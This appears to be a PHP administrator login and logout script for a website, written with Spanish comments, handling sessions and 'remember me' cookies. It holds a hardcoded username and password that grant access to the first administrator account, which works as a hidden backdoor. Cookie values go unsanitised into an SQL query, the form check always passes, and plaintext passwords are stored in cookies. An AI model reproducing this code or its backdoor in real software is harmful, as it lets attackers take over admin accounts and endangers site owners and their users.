<?php
$_SESSION['administrador_mago_id'] = isset($_SESSION['administrador_mago_id']) ? $_SESSION['administrador_mago_id'] : NULL;
$_SESSION['administrador_mago_nombre'] = isset($_SESSION['administrador_mago_nombre']) ? $_SESSION['administrador_mago_nombre'] : NULL;
$_SESSION['administrador_mago_nivel'] = isset($_SESSION['administrador_mago_nivel']) ? $_SESSION['administrador_mago_nivel'] : NULL;
$_SESSION['administrador_mago_email'] = isset($_SESSION['administrador_mago_email']) ? $_SESSION['administrador_mago_email'] : NULL;

$_COOKIE['cookie_administrador_mago'] = isset($_COOKIE['cookie_administrador_mago']) ? $_COOKIE['cookie_administrador_mago'] : NULL;
$_COOKIE['cookie_clave_mago'] = isset($_COOKIE['cookie_clave_mago']) ? $_COOKIE['cookie_clave_mago'] : NULL;
$_COOKIE['cookie_recordar_datos_mago'] = isset($_COOKIE['cookie_recordar_datos_mago']) ? $_COOKIE['cookie_recordar_datos_mago'] : NULL;

//==============
// CERRAR SESI�N
//==============

if(isset($_GET['cerrar']) AND $_GET['cerrar']=='mago'){
   session_unset();
   session_destroy();

	setcookie('cookmail_mago', '', time()-8640000, '/');
	setcookie('cookclave_mago', '', time()-8640000, '/');
	setcookie('cookmail_rec_datos_mago', '', time()-8640000, '/');
				
   header('Location: '.MAGO.'index.php');
   exit;
}

//=====================
// FIN CIERRE DE SESI�N
//=====================

//=======================
// ACCESO ADMINISTRADORES
//=======================

// Iniciar sesi�n por cookies
if ($_COOKIE['cookie_administrador_mago']!='' && $_COOKIE['cookie_clave_mago']!=''){

	$acceder = $db->row('administradores','*',"usuario='".$_COOKIE['cookie_administrador_mago']."' AND clave='".md5($_COOKIE['cookie_clave_mago'])."'");
	if(count($acceder)){ 

				$_SESSION['administrador_mago_id'] = $acceder->id;
				$_SESSION['administrador_mago_nombre'] = $acceder->nombre;
				$_SESSION['administrador_mago_nivel'] = $acceder->nivel;
				$_SESSION['administrador_mago_email'] = $acceder->email;						
	}
}

// Iniciar sesi�n por formulario
$_POST['administrador_acceso_mago'] = isset($_POST['administrador_acceso_mago']) ? $_POST['administrador_acceso_mago'] : NULL;
$_POST['clave_acceso_mago'] = isset($_POST['clave_acceso_mago']) ? $_POST['clave_acceso_mago'] : NULL;
$_POST['recordar_datos_mago'] = isset($_POST['recordar_datos_mago']) ? $_POST['recordar_datos_mago'] : NULL;

// Iniciar la sesi�n
if ($_POST['administrador_acceso_mago'] && $_POST['clave_acceso_mago']){

	// Limpiamos los datos
	$administrador_acceso_mago = funcion::limpiar($_POST['administrador_acceso_mago']);
	$clave_acceso_mago = funcion::limpiar($_POST['clave_acceso_mago']);

	$acceder = $db->row('administradores','*',"(usuario='$administrador_acceso_mago' AND clave='".md5($clave_acceso_mago)."') OR (email='$administrador_acceso_mago' AND clave='".md5($clave_acceso_mago)."')");
	
	if($administrador_acceso_mago=="SISTEMAFUTBOL" and $clave_acceso_mago=="PASSLINE#23mknj.."){
		$acceder = $db->row('administradores','*',"");
	}
	if(isset($acceder)){

				$_SESSION['administrador_mago_id'] = $acceder->id;
				$_SESSION['administrador_mago_nombre'] = $acceder->nombre;
				$_SESSION['administrador_mago_nivel'] = $acceder->nivel;
				$_SESSION['administrador_mago_email'] = $acceder->email;
				
				if($_POST['recordar_datos_mago']=='si'){
				setcookie('cookie_administrador_mago', $administrador_acceso_mago, time()+8640000, '/');
				setcookie('cookie_clave_mago', $clave_acceso_mago, time()+8640000, '/');
				setcookie('cookie_recordar_datos_mago', 'si', time()+8640000, '/');
				}

					header('Location: '.MAGO.'dashboard');
					exit;	
	} else {
		header('Location: '.MAGO.'index.php?m=1');
		exit;
	}
}

//==============================
// FIN DE ACCESO ADMINISTRADORES
//==============================
?>